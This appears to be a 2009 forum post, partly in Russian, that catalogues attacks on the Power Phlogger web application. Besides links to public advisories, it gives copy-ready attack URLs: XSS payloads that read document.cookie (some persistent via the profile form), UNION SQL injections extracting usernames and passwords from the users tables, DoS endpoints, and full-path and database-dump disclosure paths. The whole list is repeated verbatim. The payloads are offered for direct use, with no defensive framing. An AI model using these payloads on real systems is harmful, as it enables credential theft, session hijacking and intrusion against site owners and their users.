baltazar
04.01.2009, 23:12
Power Phlogger <= 2.0.9 (config.inc.php3) File Include Vulnerability (http://www.milw0rm.com/exploits/2602)
Power Phlogger Rel_Path Remote File Include Vulnerability (http://www.securityfocus.com/bid/20638)
Power Phlogger Login.PHP SQL Injection Vulnerability (http://www.securityfocus.com/bid/24622)
Power Phlogger 'css_str' SQL Injection Vulnerability (http://www.securityfocus.com/bid/29566)
Power Phlogger 2.0.9 Remote|Local File Include Vulnerability (http://www.security.nnov.ru/Odocument804.html)
Power Phlogger v.2.2.5 (username) SQL Injection (http://securityvulns.ru/Rdocument349.html)
XSS:
http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(doc ument.cookie)%3C/script%3E
http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(docu ment.cookie)%3C/script%3E
http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(docume nt.cookie)%3C/script%3E
http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E
http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(docume nt.cookie)%3C/script%3E&action=edit
http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(docume nt.cookie)%3C/script%3E
http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(docum ent.cookie)%3C/script%3E
http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E
http://site/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E
http://site/dspLogs.php/%22%3E%3Cscript%20src=XSS
http://site/dspStats.php/%22%3E%3Cscript%20src=XSS
http://site/edCss.php/%22%3E%3Cscript%20src=XSS
http://site/edCss.php?action=create+new&fields%5Bcss%5D=%3Cscript%3Ealert(document.cookie) %3C/script%3E
XSS (Persistent):
Post запрос на странице http://site/edUserprofile.php
</textarea><script>alert(document.cookie)</script>
В параметре N_your_url
"><script>alert(document.cookie)</script>
В параметре N_email
"><script src=http://site.com
В параметрах N_fg_c, N_bg_c(до 30 символов)
DoS:
http://site/include/get_userdata.php
http://site/newaccount_self.php
Зацикленные редиректы.
(c)MustLive
SQL иньекции:
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null%20from%20pphl_users%20limit%200,1&action=edit
http://site/edit.php?site=-12%20union%20select%200,1,username,password,4,vers ion(),user(),7,8,9,10,11,database(),13,14,15,16,17 ,18++from+users--
Full path disclosure:
http://site/include/edCss.inc.php
http://site/include/foot.inc.php
http://site/include/get_csscolors.inc.php
http://site/include/head.inc.php
http://site/include/head_stuff.inc.php
http://site/include/loglist.inc.php
http://site/include/pphlogger_send.inc.php
http://site/modules/usercreate.php
http://site/modules/htmlMimeMail.php
http://site/modules/img_vis_per_hour.mod.php
http://site/modules/usercreate.php
http://site/modules/htmlMimeMail.php
http://site/modules/img_vis_per_hour.mod.php
http://site/edit_user.php
http://site/main-dummy.php
http://site/main.php
http://site/modules/htmlMimeMail.php
http://site/modules/img_vis_per_hour.mod.php
http://site/modules/usercreate.php
Information disclosure:
http://site/modules/db_dump.php
Названия базы данных,струкрура таблиц
http://site/robots.txt
http://site/upgrade/extchange.php
http://site/main_location.inc
<meta name="PHP Version" content="..." />
<meta name="MYSQL Version" content="..." />
Power Phlogger Rel_Path Remote File Include Vulnerability (http://www.securityfocus.com/bid/20638)
Power Phlogger Login.PHP SQL Injection Vulnerability (http://www.securityfocus.com/bid/24622)
Power Phlogger 'css_str' SQL Injection Vulnerability (http://www.securityfocus.com/bid/29566)
Power Phlogger 2.0.9 Remote|Local File Include Vulnerability (http://www.security.nnov.ru/Odocument804.html)
Power Phlogger v.2.2.5 (username) SQL Injection (http://securityvulns.ru/Rdocument349.html)
XSS:
http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(doc ument.cookie)%3C/script%3E
http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(docu ment.cookie)%3C/script%3E
http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(docume nt.cookie)%3C/script%3E
http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E
http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(docume nt.cookie)%3C/script%3E&action=edit
http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(docume nt.cookie)%3C/script%3E
http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(docum ent.cookie)%3C/script%3E
http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document. cookie)%3C/script%3E
http://site/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document .cookie)%3C/script%3E
http://site/dspLogs.php/%22%3E%3Cscript%20src=XSS
http://site/dspStats.php/%22%3E%3Cscript%20src=XSS
http://site/edCss.php/%22%3E%3Cscript%20src=XSS
http://site/edCss.php?action=create+new&fields%5Bcss%5D=%3Cscript%3Ealert(document.cookie) %3C/script%3E
XSS (Persistent):
Post запрос на странице http://site/edUserprofile.php
</textarea><script>alert(document.cookie)</script>
В параметре N_your_url
"><script>alert(document.cookie)</script>
В параметре N_email
"><script src=http://site.com
В параметрах N_fg_c, N_bg_c(до 30 символов)
DoS:
http://site/include/get_userdata.php
http://site/newaccount_self.php
Зацикленные редиректы.
(c)MustLive
SQL иньекции:
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null%20from%20pphl_users%20limit%200,1&action=edit
http://site/edit.php?site=-12%20union%20select%200,1,username,password,4,vers ion(),user(),7,8,9,10,11,database(),13,14,15,16,17 ,18++from+users--
Full path disclosure:
http://site/include/edCss.inc.php
http://site/include/foot.inc.php
http://site/include/get_csscolors.inc.php
http://site/include/head.inc.php
http://site/include/head_stuff.inc.php
http://site/include/loglist.inc.php
http://site/include/pphlogger_send.inc.php
http://site/modules/usercreate.php
http://site/modules/htmlMimeMail.php
http://site/modules/img_vis_per_hour.mod.php
http://site/modules/usercreate.php
http://site/modules/htmlMimeMail.php
http://site/modules/img_vis_per_hour.mod.php
http://site/edit_user.php
http://site/main-dummy.php
http://site/main.php
http://site/modules/htmlMimeMail.php
http://site/modules/img_vis_per_hour.mod.php
http://site/modules/usercreate.php
Information disclosure:
http://site/modules/db_dump.php
Названия базы данных,струкрура таблиц
http://site/robots.txt
http://site/upgrade/extchange.php
http://site/main_location.inc
<meta name="PHP Version" content="..." />
<meta name="MYSQL Version" content="..." />